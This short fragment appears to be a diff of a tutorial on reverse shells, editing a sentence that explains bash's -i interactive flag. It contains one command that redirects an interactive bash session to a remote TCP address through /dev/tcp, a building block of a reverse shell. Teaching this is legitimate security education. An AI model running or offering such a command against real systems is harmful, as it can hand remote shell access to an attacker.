Table of contents

 $ /bin/bash -i > /dev/tcp/10.10.0.5/9090

-You will notice that you are still in bash, however, a new instance of bash has been created in interactive mode.
+You will notice that you are still in bash, however, a new instance of bash has been created in interactive mode (thus the -i above which stands for interactive).

 Question sheet